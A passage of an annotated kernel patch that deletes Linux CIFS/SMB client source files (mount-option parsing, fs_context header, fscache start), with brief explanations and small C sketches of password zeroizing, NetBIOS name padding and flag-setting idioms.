+-		ctx->got_version = true;
+-		break;
+-	case Opt_sec:
+-		if (cifs_parse_security_flavors(fc, param->string, ctx) != 0)
+-			goto cifs_parse_mount_err;
+-		break;
+-	case Opt_cache:
+-		if (cifs_parse_cache_flavor(fc, param->string, ctx) != 0)
+-			goto cifs_parse_mount_err;
+-		break;
+-	case Opt_witness:
+-#ifndef CONFIG_CIFS_SWN_UPCALL
+-		cifs_errorf(fc, "Witness support needs CONFIG_CIFS_SWN_UPCALL config option\n");
+-			goto cifs_parse_mount_err;
+-#endif
+-		ctx->witness = true;
+-		pr_warn_once("Witness protocol support is experimental\n");
+-		break;
+-	case Opt_rootfs:
+-#ifndef CONFIG_CIFS_ROOT
+-		cifs_dbg(VFS, "rootfs support requires CONFIG_CIFS_ROOT config option\n");
+-		goto cifs_parse_mount_err;
+-#endif
+-		ctx->rootfs = true;
+-		break;
+-	case Opt_posixpaths:
+-		if (result.negated)
+-			ctx->posix_paths = 0;
+-		else
+-			ctx->posix_paths = 1;
+-		break;
+-	case Opt_unix:
+-		if (result.negated) {
+-			if (ctx->linux_ext == 1)
+-				pr_warn_once("conflicting posix mount options specified\n");
+-			ctx->linux_ext = 0;
+-			ctx->no_linux_ext = 1;
+-		} else {
+-			if (ctx->no_linux_ext == 1)
+-				pr_warn_once("conflicting posix mount options specified\n");
+-			ctx->linux_ext = 1;
+-			ctx->no_linux_ext = 0;
+-		}
+-		break;
+-	case Opt_nocase:
+-		ctx->nocase = 1;
+-		break;
+-	case Opt_brl:
+-		if (result.negated) {
+-			/*
+-			 * turn off mandatory locking in the file mode
+-			 * if remote locking is turned off, since the
+-			 * local vfs will do advisory locking instead
+-			 */
+-			if (ctx->file_mode ==
+-				(S_IALLUGO & ~(S_ISUID | S_IXGRP)))
+-				ctx->file_mode = S_IALLUGO;
+-			ctx->nobrl =  1;
+-		} else
+-			ctx->nobrl =  0;
+-		break;
+-	case Opt_handlecache:
+-		if (result.negated)
+-			ctx->nohandlecache = 1;
+-		else
+-			ctx->nohandlecache = 0;
+-		break;
+-	case Opt_forcemandatorylock:
+-		ctx->mand_lock = 1;
+-		break;
+-	case Opt_setuids:
+-		ctx->setuids = result.negated;
+-		break;
+-	case Opt_intr:
+-		ctx->intr = !result.negated;
+-		break;
+-	case Opt_setuidfromacl:
+-		ctx->setuidfromacl = 1;
+-		break;
+-	case Opt_strictsync:
+-		ctx->nostrictsync = result.negated;
+-		break;
+-	case Opt_serverino:
+-		ctx->server_ino = !result.negated;
+-		break;
+-	case Opt_rwpidforward:
+-		ctx->rwpidforward = 1;
+-		break;
+-	case Opt_modesid:
+-		ctx->mode_ace = 1;
+-		break;
+-	case Opt_cifsacl:
+-		ctx->cifs_acl = !result.negated;
+-		break;
+-	case Opt_acl:
+-		ctx->no_psx_acl = result.negated;
+-		break;
+-	case Opt_locallease:
+-		ctx->local_lease = 1;
+-		break;
+-	case Opt_sign:
+-		ctx->sign = true;
+-		break;
+-	case Opt_ignore_signature:
+-		ctx->sign = true;
+-		ctx->ignore_signature = true;
+-		break;
+-	case Opt_seal:
+-		/* we do not do the following in secFlags because seal
+-		 * is a per tree connection (mount) not a per socket
+-		 * or per-smb connection option in the protocol
+-		 * vol->secFlg |= CIFSSEC_MUST_SEAL;
+-		 */
+-		ctx->seal = 1;
+-		break;
+-	case Opt_noac:
+-		pr_warn("Mount option noac not supported. Instead set /proc/fs/cifs/LookupCacheEnabled to 0\n");
+-		break;
+-	case Opt_fsc:
+-#ifndef CONFIG_CIFS_FSCACHE
+-		cifs_errorf(fc, "FS-Cache support needs CONFIG_CIFS_FSCACHE kernel config option set\n");
+-		goto cifs_parse_mount_err;
+-#endif
+-		ctx->fsc = true;
+-		break;
+-	case Opt_mfsymlinks:
+-		ctx->mfsymlinks = true;
+-		break;
+-	case Opt_multiuser:
+-		ctx->multiuser = true;
+-		break;
+-	case Opt_sloppy:
+-		ctx->sloppy = true;
+-		break;
+-	case Opt_nosharesock:
+-		ctx->nosharesock = true;
+-		break;
+-	case Opt_persistent:
+-		if (result.negated) {
+-			ctx->nopersistent = true;
+-			if (ctx->persistent) {
+-				cifs_errorf(fc, "persistenthandles mount options conflict\n");
+-				goto cifs_parse_mount_err;
+-			}
+-		} else {
+-			ctx->persistent = true;
+-			if ((ctx->nopersistent) || (ctx->resilient)) {
+-				cifs_errorf(fc, "persistenthandles mount options conflict\n");
+-				goto cifs_parse_mount_err;
+-			}
+-		}
+-		break;
+-	case Opt_resilient:
+-		if (result.negated) {
+-			ctx->resilient = false; /* already the default */
+-		} else {
+-			ctx->resilient = true;
+-			if (ctx->persistent) {
+-				cifs_errorf(fc, "persistenthandles mount options conflict\n");
+-				goto cifs_parse_mount_err;
+-			}
+-		}
+-		break;
+-	case Opt_tcp_nodelay:
+-		/* tcp nodelay should not usually be needed since we CORK/UNCORK the socket */
+-		if (result.negated)
+-			ctx->sockopt_tcp_nodelay = false;
+-		else
+-			ctx->sockopt_tcp_nodelay = true;
+-		break;
+-	case Opt_domainauto:
+-		ctx->domainauto = true;
+-		break;
+-	case Opt_rdma:
+-		ctx->rdma = true;
+-		break;
+-	}
+-	/* case Opt_ignore: - is ignored as expected ... */
+-
+-	return 0;
+-
+- cifs_parse_mount_err:
+-	kfree_sensitive(ctx->password);
+-	return -EINVAL;
+-}
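
One detail of the error path above: cifs_parse_mount_err frees the
password with kfree_sensitive(), which zeroizes the buffer before
freeing it so cleartext does not linger in freed memory. A userspace
analogue (explicit_bzero() is available on glibc 2.25+ and the BSDs;
a plain memset() before free() may be optimized away, which is exactly
the problem these helpers solve):

#include <stdlib.h>
#include <string.h>

/* sketch of kfree_sensitive(): wipe, then free */
static void free_sensitive(char *s)
{
	if (!s)
		return;
	explicit_bzero(s, strlen(s));
	free(s);
}

int main(void)
{
	char *pw = strdup("hunter2");

	free_sensitive(pw);	/* bytes are cleared before the heap reuses them */
	return 0;
}
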
+-
+-int smb3_init_fs_context(struct fs_context *fc)
+-{
+-	struct smb3_fs_context *ctx;
+-	char *nodename = utsname()->nodename;
+-	int i;
+-
+-	ctx = kzalloc(sizeof(struct smb3_fs_context), GFP_KERNEL);
+-	if (unlikely(!ctx))
+-		return -ENOMEM;
+-
+-	strscpy(ctx->workstation_name, nodename, sizeof(ctx->workstation_name));
+-
+-	/*
+-	 * This does not have to be a perfect mapping since the field is
+-	 * informational, only used for servers that do not support
+-	 * port 445, and it can be overridden at mount time.
+-	 */
+-	memset(ctx->source_rfc1001_name, 0x20, RFC1001_NAME_LEN);
+-	for (i = 0; i < strnlen(nodename, RFC1001_NAME_LEN); i++)
+-		ctx->source_rfc1001_name[i] = toupper(nodename[i]);
+-
+-	ctx->source_rfc1001_name[RFC1001_NAME_LEN] = 0;
+-	/*
+-	 * null target name indicates to use *SMBSERVER default called name
+-	 *  if we end up sending RFC1001 session initialize
+-	 */
+-	ctx->target_rfc1001_name[0] = 0;
+-	ctx->cred_uid = current_uid();
+-	ctx->linux_uid = current_uid();
+-	ctx->linux_gid = current_gid();
+-	/* By default 4MB read ahead size, 1MB block size */
+-	ctx->bsize = CIFS_DEFAULT_IOSIZE; /* can improve cp performance significantly */
+-	ctx->rasize = 0; /* 0 = use default (ie negotiated rsize) for read ahead pages */
+-
+-	/*
+-	 * default to SFM style remapping of seven reserved characters
+-	 * unless user overrides it or we negotiate CIFS POSIX where
+-	 * it is unnecessary.  Can not simultaneously use more than one mapping
+-	 * since then readdir could list files that open could not open
+-	 */
+-	ctx->remap = true;
+-
+-	/* default to only allowing write access to owner of the mount */
+-	ctx->dir_mode = ctx->file_mode = S_IRUGO | S_IXUGO | S_IWUSR;
+-
+-	/* ctx->retry default is 0 (i.e. "soft" limited retry not hard retry) */
+-	/* default is always to request posix paths. */
+-	ctx->posix_paths = 1;
+-	/* default to using server inode numbers where available */
+-	ctx->server_ino = 1;
+-
+-	/* default is to use strict cifs caching semantics */
+-	ctx->strict_io = true;
+-
+-	ctx->acregmax = CIFS_DEF_ACTIMEO;
+-	ctx->acdirmax = CIFS_DEF_ACTIMEO;
+-	ctx->closetimeo = SMB3_DEF_DCLOSETIMEO;
+-
+-	/* Most clients set timeout to 0, allows server to use its default */
+-	ctx->handle_timeout = 0; /* See MS-SMB2 spec section 2.2.14.2.12 */
+-
+-	/* offer SMB2.1 and later (SMB3 etc). Secure and widely accepted */
+-	ctx->ops = &smb30_operations;
+-	ctx->vals = &smbdefault_values;
+-
+-	ctx->echo_interval = SMB_ECHO_INTERVAL_DEFAULT;
+-
+-	/* default to no multichannel (single server connection) */
+-	ctx->multichannel = false;
+-	ctx->max_channels = 1;
+-
+-	ctx->backupuid_specified = false; /* no backup intent for a user */
+-	ctx->backupgid_specified = false; /* no backup intent for a group */
+-
+-/*
+- *	short int override_uid = -1;
+- *	short int override_gid = -1;
+- *	char *nodename = strdup(utsname()->nodename);
+- *	struct sockaddr *dstaddr = (struct sockaddr *)&vol->dstaddr;
+- */
+-
+-	fc->fs_private = ctx;
+-	fc->ops = &smb3_fs_context_ops;
+-	return 0;
+-}
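
Among the defaults set above, the client NetBIOS name deserves a
worked example: it is the uppercased nodename, space-padded (0x20) to
the 15-character RFC 1001 name length, with the 16th byte left zero.
A standalone sketch (the nodename is a made-up stand-in for
utsname()->nodename):

#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define RFC1001_NAME_LEN 15

int main(void)
{
	const char *nodename = "buildbox";
	char name[RFC1001_NAME_LEN + 1];
	size_t i;

	memset(name, 0x20, RFC1001_NAME_LEN);	/* space padding per RFC 1001 */
	for (i = 0; i < strnlen(nodename, RFC1001_NAME_LEN); i++)
		name[i] = toupper((unsigned char)nodename[i]);
	name[RFC1001_NAME_LEN] = 0;

	printf("'%s'\n", name);	/* prints 'BUILDBOX       ' */
	return 0;
}
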
+-
+-void
+-smb3_cleanup_fs_context_contents(struct smb3_fs_context *ctx)
+-{
+-	if (ctx == NULL)
+-		return;
+-
+-	/*
+-	 * Make sure this stays in sync with smb3_fs_context_dup()
+-	 */
+-	kfree(ctx->mount_options);
+-	ctx->mount_options = NULL;
+-	kfree(ctx->username);
+-	ctx->username = NULL;
+-	kfree_sensitive(ctx->password);
+-	ctx->password = NULL;
+-	kfree(ctx->server_hostname);
+-	ctx->server_hostname = NULL;
+-	kfree(ctx->UNC);
+-	ctx->UNC = NULL;
+-	kfree(ctx->source);
+-	ctx->source = NULL;
+-	kfree(ctx->domainname);
+-	ctx->domainname = NULL;
+-	kfree(ctx->nodename);
+-	ctx->nodename = NULL;
+-	kfree(ctx->iocharset);
+-	ctx->iocharset = NULL;
+-	kfree(ctx->prepath);
+-	ctx->prepath = NULL;
+-}
+-
+-void
+-smb3_cleanup_fs_context(struct smb3_fs_context *ctx)
+-{
+-	if (!ctx)
+-		return;
+-	smb3_cleanup_fs_context_contents(ctx);
+-	kfree(ctx);
+-}
+-
+-void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb)
+-{
+-	struct smb3_fs_context *ctx = cifs_sb->ctx;
+-
+-	if (ctx->nodfs)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_DFS;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_DFS;
+-
+-	if (ctx->noperm)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_PERM;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_PERM;
+-
+-	if (ctx->setuids)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_SET_UID;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SET_UID;
+-
+-	if (ctx->setuidfromacl)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_UID_FROM_ACL;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_UID_FROM_ACL;
+-
+-	if (ctx->server_ino)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_SERVER_INUM;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SERVER_INUM;
+-
+-	if (ctx->remap)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MAP_SFM_CHR;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MAP_SFM_CHR;
+-
+-	if (ctx->sfu_remap)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MAP_SPECIAL_CHR;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MAP_SPECIAL_CHR;
+-
+-	if (ctx->no_xattr)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_XATTR;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_XATTR;
+-
+-	if (ctx->sfu_emul)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_UNX_EMUL;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_UNX_EMUL;
+-
+-	if (ctx->nobrl)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_BRL;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_BRL;
+-
+-	if (ctx->nohandlecache)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_HANDLE_CACHE;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_HANDLE_CACHE;
+-
+-	if (ctx->nostrictsync)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NOSSYNC;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NOSSYNC;
+-
+-	if (ctx->mand_lock)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NOPOSIXBRL;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NOPOSIXBRL;
+-
+-	if (ctx->rwpidforward)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_RWPIDFORWARD;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_RWPIDFORWARD;
+-
+-	if (ctx->mode_ace)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MODE_FROM_SID;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MODE_FROM_SID;
+-
+-	if (ctx->cifs_acl)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_CIFS_ACL;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_CIFS_ACL;
+-
+-	if (ctx->backupuid_specified)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_CIFS_BACKUPUID;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_CIFS_BACKUPUID;
+-
+-	if (ctx->backupgid_specified)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_CIFS_BACKUPGID;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_CIFS_BACKUPGID;
+-
+-	if (ctx->override_uid)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_OVERR_UID;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_OVERR_UID;
+-
+-	if (ctx->override_gid)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_OVERR_GID;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_OVERR_GID;
+-
+-	if (ctx->dynperm)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_DYNPERM;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_DYNPERM;
+-
+-	if (ctx->fsc)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_FSCACHE;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_FSCACHE;
+-
+-	if (ctx->multiuser)
+-		cifs_sb->mnt_cifs_flags |= (CIFS_MOUNT_MULTIUSER |
+-					    CIFS_MOUNT_NO_PERM);
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MULTIUSER;
+-
+-	if (ctx->strict_io)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_STRICT_IO;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_STRICT_IO;
+-
+-	if (ctx->direct_io)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_DIRECT_IO;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_DIRECT_IO;
+-
+-	if (ctx->mfsymlinks)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MF_SYMLINKS;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MF_SYMLINKS;
+-	if (ctx->mfsymlinks) {
+-		if (ctx->sfu_emul) {
+-			/*
+-			 * Our SFU ("Services for Unix" emulation does not allow
+-			 * creating symlinks but does allow reading existing SFU
+-			 * symlinks (it does allow both creating and reading SFU
+-			 * style mknod and FIFOs though). When "mfsymlinks" and
+-			 * "sfu" are both enabled at the same time, it allows
+-			 * reading both types of symlinks, but will only create
+-			 * them with mfsymlinks format. This allows better
+-			 * Apple compatibility (probably better for Samba too)
+-			 * while still recognizing old Windows style symlinks.
+-			 */
+-			cifs_dbg(VFS, "mount options mfsymlinks and sfu both enabled\n");
+-		}
+-	}
+-	cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SHUTDOWN;
+-
+-	return;
+-}
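
Every branch in smb3_update_mnt_flags() is the same set-or-clear idiom
on mnt_cifs_flags. For readability, the whole function can be thought
of as repeated applications of a helper like this kernel-style sketch
(the helper is hypothetical, not a kernel API):

/* set @flag in @word when @cond is true, otherwise clear it */
static inline void assign_flag(unsigned int *word, unsigned int flag,
			       bool cond)
{
	if (cond)
		*word |= flag;
	else
		*word &= ~flag;
}

so that, for instance, the first branch would read:

	assign_flag(&cifs_sb->mnt_cifs_flags, CIFS_MOUNT_NO_DFS, ctx->nodfs);
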
+diff --git a/fs/cifs/fs_context.h b/fs/cifs/fs_context.h
+deleted file mode 100644
+index 26093f54d3e65..0000000000000
+--- a/fs/cifs/fs_context.h
++++ /dev/null
+@@ -1,293 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2020, Microsoft Corporation.
+- *
+- *   Author(s): Steve French <stfrench@microsoft.com>
+- *              David Howells <dhowells@redhat.com>
+- */
+-
+-#ifndef _FS_CONTEXT_H
+-#define _FS_CONTEXT_H
+-
+-#include "cifsglob.h"
+-#include <linux/parser.h>
+-#include <linux/fs_parser.h>
+-
+-/* Log errors in fs_context (new mount api) but also in dmesg (old style) */
+-#define cifs_errorf(fc, fmt, ...)			\
+-	do {						\
+-		errorf(fc, fmt, ## __VA_ARGS__);	\
+-		cifs_dbg(VFS, fmt, ## __VA_ARGS__);	\
+-	} while (0)
+-
+-enum smb_version {
+-	Smb_1 = 1,
+-	Smb_20,
+-	Smb_21,
+-	Smb_30,
+-	Smb_302,
+-	Smb_311,
+-	Smb_3any,
+-	Smb_default,
+-	Smb_version_err
+-};
+-
+-enum {
+-	Opt_cache_loose,
+-	Opt_cache_strict,
+-	Opt_cache_none,
+-	Opt_cache_ro,
+-	Opt_cache_rw,
+-	Opt_cache_err
+-};
+-
+-enum cifs_sec_param {
+-	Opt_sec_krb5,
+-	Opt_sec_krb5i,
+-	Opt_sec_krb5p,
+-	Opt_sec_ntlmsspi,
+-	Opt_sec_ntlmssp,
+-	Opt_sec_ntlmv2,
+-	Opt_sec_ntlmv2i,
+-	Opt_sec_none,
+-
+-	Opt_sec_err
+-};
+-
+-enum cifs_param {
+-	/* Mount options that take no arguments */
+-	Opt_user_xattr,
+-	Opt_forceuid,
+-	Opt_forcegid,
+-	Opt_noblocksend,
+-	Opt_noautotune,
+-	Opt_nolease,
+-	Opt_nosparse,
+-	Opt_hard,
+-	Opt_soft,
+-	Opt_perm,
+-	Opt_nodelete,
+-	Opt_mapposix,
+-	Opt_mapchars,
+-	Opt_nomapchars,
+-	Opt_sfu,
+-	Opt_nodfs,
+-	Opt_posixpaths,
+-	Opt_unix,
+-	Opt_nocase,
+-	Opt_brl,
+-	Opt_handlecache,
+-	Opt_forcemandatorylock,
+-	Opt_setuidfromacl,
+-	Opt_setuids,
+-	Opt_dynperm,
+-	Opt_intr,
+-	Opt_strictsync,
+-	Opt_serverino,
+-	Opt_rwpidforward,
+-	Opt_cifsacl,
+-	Opt_acl,
+-	Opt_locallease,
+-	Opt_sign,
+-	Opt_ignore_signature,
+-	Opt_seal,
+-	Opt_noac,
+-	Opt_fsc,
+-	Opt_mfsymlinks,
+-	Opt_multiuser,
+-	Opt_sloppy,
+-	Opt_nosharesock,
+-	Opt_persistent,
+-	Opt_resilient,
+-	Opt_tcp_nodelay,
+-	Opt_domainauto,
+-	Opt_rdma,
+-	Opt_modesid,
+-	Opt_rootfs,
+-	Opt_multichannel,
+-	Opt_compress,
+-	Opt_witness,
+-
+-	/* Mount options which take numeric value */
+-	Opt_backupuid,
+-	Opt_backupgid,
+-	Opt_uid,
+-	Opt_cruid,
+-	Opt_gid,
+-	Opt_port,
+-	Opt_file_mode,
+-	Opt_dirmode,
+-	Opt_min_enc_offload,
+-	Opt_blocksize,
+-	Opt_rasize,
+-	Opt_rsize,
+-	Opt_wsize,
+-	Opt_actimeo,
+-	Opt_acdirmax,
+-	Opt_acregmax,
+-	Opt_closetimeo,
+-	Opt_echo_interval,
+-	Opt_max_credits,
+-	Opt_snapshot,
+-	Opt_max_channels,
+-	Opt_handletimeout,
+-
+-	/* Mount options which take string value */
+-	Opt_source,
+-	Opt_user,
+-	Opt_pass,
+-	Opt_ip,
+-	Opt_domain,
+-	Opt_srcaddr,
+-	Opt_iocharset,
+-	Opt_netbiosname,
+-	Opt_servern,
+-	Opt_ver,
+-	Opt_vers,
+-	Opt_sec,
+-	Opt_cache,
+-
+-	/* Mount options to be ignored */
+-	Opt_ignore,
+-
+-	Opt_err
+-};
+-
+-struct smb3_fs_context {
+-	bool uid_specified;
+-	bool cruid_specified;
+-	bool gid_specified;
+-	bool sloppy;
+-	bool got_ip;
+-	bool got_version;
+-	bool got_rsize;
+-	bool got_wsize;
+-	bool got_bsize;
+-	unsigned short port;
+-
+-	char *username;
+-	char *password;
+-	char *domainname;
+-	char *source;
+-	char *server_hostname;
+-	char *UNC;
+-	char *nodename;
+-	char workstation_name[CIFS_MAX_WORKSTATION_LEN];
+-	char *iocharset;  /* local code page for mapping to and from Unicode */
+-	char source_rfc1001_name[RFC1001_NAME_LEN_WITH_NULL]; /* clnt nb name */
+-	char target_rfc1001_name[RFC1001_NAME_LEN_WITH_NULL]; /* srvr nb name */
+-	kuid_t cred_uid;
+-	kuid_t linux_uid;
+-	kgid_t linux_gid;
+-	kuid_t backupuid;
+-	kgid_t backupgid;
+-	umode_t file_mode;
+-	umode_t dir_mode;
+-	enum securityEnum sectype; /* sectype requested via mnt opts */
+-	bool sign; /* was signing requested via mnt opts? */
+-	bool ignore_signature:1;
+-	bool retry:1;
+-	bool intr:1;
+-	bool setuids:1;
+-	bool setuidfromacl:1;
+-	bool override_uid:1;
+-	bool override_gid:1;
+-	bool dynperm:1;
+-	bool noperm:1;
+-	bool nodelete:1;
+-	bool mode_ace:1;
+-	bool no_psx_acl:1; /* set if posix acl support should be disabled */
+-	bool cifs_acl:1;
+-	bool backupuid_specified; /* mount option  backupuid  is specified */
+-	bool backupgid_specified; /* mount option  backupgid  is specified */
+-	bool no_xattr:1;   /* set if xattr (EA) support should be disabled*/
+-	bool server_ino:1; /* use inode numbers from server ie UniqueId */
+-	bool direct_io:1;
+-	bool strict_io:1; /* strict cache behavior */
+-	bool cache_ro:1;
+-	bool cache_rw:1;
+-	bool remap:1;      /* set to remap seven reserved chars in filenames */
+-	bool sfu_remap:1;  /* remap seven reserved chars ala SFU */
+-	bool posix_paths:1; /* unset to not ask for posix pathnames. */
+-	bool no_linux_ext:1;
+-	bool linux_ext:1;
+-	bool sfu_emul:1;
+-	bool nullauth:1;   /* attempt to authenticate with null user */
+-	bool nocase:1;     /* request case insensitive filenames */
+-	bool nobrl:1;      /* disable sending byte range locks to srv */
+-	bool nohandlecache:1; /* disable caching dir handles if srvr probs */
+-	bool mand_lock:1;  /* send mandatory not posix byte range lock reqs */
+-	bool seal:1;       /* request transport encryption on share */
+-	bool nodfs:1;      /* Do not request DFS, even if available */
+-	bool local_lease:1; /* check leases only on local system, not remote */
+-	bool noblocksnd:1;
+-	bool noautotune:1;
+-	bool nostrictsync:1; /* do not force expensive SMBflush on every sync */
+-	bool no_lease:1;     /* disable requesting leases */
+-	bool no_sparse:1;    /* do not attempt to set files sparse */
+-	bool fsc:1;	/* enable fscache */
+-	bool mfsymlinks:1; /* use Minshall+French Symlinks */
+-	bool multiuser:1;
+-	bool rwpidforward:1; /* pid forward for read/write operations */
+-	bool nosharesock:1;
+-	bool persistent:1;
+-	bool nopersistent:1;
+-	bool resilient:1; /* noresilient not required since not forced for CA */
+-	bool domainauto:1;
+-	bool rdma:1;
+-	bool multichannel:1;
+-	bool use_client_guid:1;
+-	/* reuse existing guid for multichannel */
+-	u8 client_guid[SMB2_CLIENT_GUID_SIZE];
+-	unsigned int bsize;
+-	unsigned int rasize;
+-	unsigned int rsize;
+-	unsigned int wsize;
+-	unsigned int min_offload;
+-	bool sockopt_tcp_nodelay:1;
+-	/* attribute cache timeout for files and directories in jiffies */
+-	unsigned long acregmax;
+-	unsigned long acdirmax;
+-	/* timeout for deferred close of files in jiffies */
+-	unsigned long closetimeo;
+-	struct smb_version_operations *ops;
+-	struct smb_version_values *vals;
+-	char *prepath;
+-	struct sockaddr_storage dstaddr; /* destination address */
+-	struct sockaddr_storage srcaddr; /* allow binding to a local IP */
+-	struct nls_table *local_nls; /* This is a copy of the pointer in cifs_sb */
+-	unsigned int echo_interval; /* echo interval in secs */
+-	__u64 snapshot_time; /* needed for timewarp tokens */
+-	__u32 handle_timeout; /* persistent and durable handle timeout in ms */
+-	unsigned int max_credits; /* smb3 max_credits, 20 <= credits <= 60000 */
+-	unsigned int max_channels;
+-	__u16 compression; /* compression algorithm 0xFFFF default 0=disabled */
+-	bool rootfs:1; /* if it's a SMB root file system */
+-	bool witness:1; /* use witness protocol */
+-
+-	char *mount_options;
+-};
+-
+-extern const struct fs_parameter_spec smb3_fs_parameters[];
+-
+-extern int smb3_init_fs_context(struct fs_context *fc);
+-extern void smb3_cleanup_fs_context_contents(struct smb3_fs_context *ctx);
+-extern void smb3_cleanup_fs_context(struct smb3_fs_context *ctx);
+-
+-static inline struct smb3_fs_context *smb3_fc2context(const struct fs_context *fc)
+-{
+-	return fc->fs_private;
+-}
+-
+-extern int smb3_fs_context_dup(struct smb3_fs_context *new_ctx, struct smb3_fs_context *ctx);
+-extern void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb);
+-
+-/*
+- * max deferred close timeout (jiffies) - 2^30
+- */
+-#define SMB3_MAX_DCLOSETIMEO (1 << 30)
+-#define SMB3_DEF_DCLOSETIMEO (1 * HZ) /* even 1 sec enough to help eg open/write/close/open/read */
+-
+-extern char *cifs_sanitize_prepath(char *prepath, gfp_t gfp);
+-
+-#endif
+diff --git a/fs/cifs/fscache.c b/fs/cifs/fscache.c
+deleted file mode 100644
+index f6f3a6b75601b..0000000000000
+--- a/fs/cifs/fscache.c
++++ /dev/null
+@@ -1,253 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *   CIFS filesystem cache interface
+- *
+- *   Copyright (c) 2010 Novell, Inc.
+- *   Author(s): Suresh Jayaraman <sjayaraman@suse.de>
+- *
+- */
+-#include "fscache.h"
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifsproto.h"
+-
+-static void cifs_fscache_fill_volume_coherency(
+-	struct cifs_tcon *tcon,
+-	struct cifs_fscache_volume_coherency_data *cd)
+-{
+-	memset(cd, 0, sizeof(*cd));
+-	cd->resource_id		= cpu_to_le64(tcon->resource_id);
+-	cd->vol_create_time	= tcon->vol_create_time;
+-	cd->vol_serial_number	= cpu_to_le32(tcon->vol_serial_number);
+-}
+-
+-int cifs_fscache_get_super_cookie(struct cifs_tcon *tcon)
+-{
+-	struct cifs_fscache_volume_coherency_data cd;
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct fscache_volume *vcookie;
+-	const struct sockaddr *sa = (struct sockaddr *)&server->dstaddr;
+-	size_t slen, i;
+-	char *sharename;
+-	char *key;
+-	int ret = -ENOMEM;
+-
+-	tcon->fscache = NULL;
+-	switch (sa->sa_family) {
+-	case AF_INET:
+-	case AF_INET6:
+-		break;
+-	default:
+-		cifs_dbg(VFS, "Unknown network family '%d'\n", sa->sa_family);
+-		return -EINVAL;
+-	}
+-
+-	memset(&key, 0, sizeof(key));
+-
+-	sharename = extract_sharename(tcon->tree_name);
+-	if (IS_ERR(sharename)) {
+-		cifs_dbg(FYI, "%s: couldn't extract sharename\n", __func__);
+-		return -EINVAL;
+-	}
+-
+-	slen = strlen(sharename);
+-	for (i = 0; i < slen; i++)
+-		if (sharename[i] == '/')
+-			sharename[i] = ';';
+-
+-	key = kasprintf(GFP_KERNEL, "cifs,%pISpc,%s", sa, sharename);
+-	if (!key)
+-		goto out;
+-
+-	cifs_fscache_fill_volume_coherency(tcon, &cd);
+-	vcookie = fscache_acquire_volume(key,
+-					 NULL, /* preferred_cache */
+-					 &cd, sizeof(cd));
+-	cifs_dbg(FYI, "%s: (%s/0x%p)\n", __func__, key, vcookie);
+-	if (IS_ERR(vcookie)) {
